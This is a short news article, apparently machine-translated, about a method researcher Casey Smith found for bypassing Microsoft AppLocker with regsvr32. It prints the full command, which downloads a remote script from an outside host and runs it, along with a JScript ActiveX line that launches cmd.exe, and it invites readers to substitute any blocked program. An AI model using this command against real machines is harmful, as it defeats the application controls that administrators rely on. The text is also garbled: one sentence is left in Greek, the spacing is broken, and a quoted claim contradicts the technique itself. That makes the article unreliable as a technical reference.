If you use Microsoft AppLocker to lock Windows computers in your office or school, then we have bad news for you.
A security researcher discovered a way to bypass it White list of Windows software and run arbitrary applications.
AppLocker allows IT administrators to manage large networks. They can determine which programs and which scripts can be run by users.
The service first came with Windows 7, and its goal was to stop non-work-related programs from starting, or malicious applications, or to stop end users from running programs used by the company or organization's support department.
Security researcher Casey Smith has discovered a way to bypass AppLocker. The bypass mode is very simple and you will find it below with a line of code: a fairly simple command.
regsvr32 / s / n / u /i:http://reg.cx/2kK3 scrobj.dll
If you run the above command in Windows you tell the operating system to download one XML file from the Internet, which instructs you to run cmd.exe.
The magic here is that if you change cmd.exe with any program that is blocked with AppLocker it will start.
"It is not well-documented that Regsvr32.exe cannot accept a URL for a script," Smith said.
In the above case, built-in JavaScript uses ActiveX:
var r = new ActiveXObject ("WScript.Shell") Run ("cmd.exe");
Είναι μια περίπτωση αλυσιδωτής σύνδεσης διαφόρων στοιχείων στο λαβύρινθο του κώδικα που χρησιμοποιούν τα Windows της Microsoft. Όλα scripts της JavaScript, της Visual Basic and Powershell can be run from the internet, or a local file, via regsvr32, according to Smith.
So even if you are connected to the PC as a simple user or visitor you can use the hack to bypass AppLock.
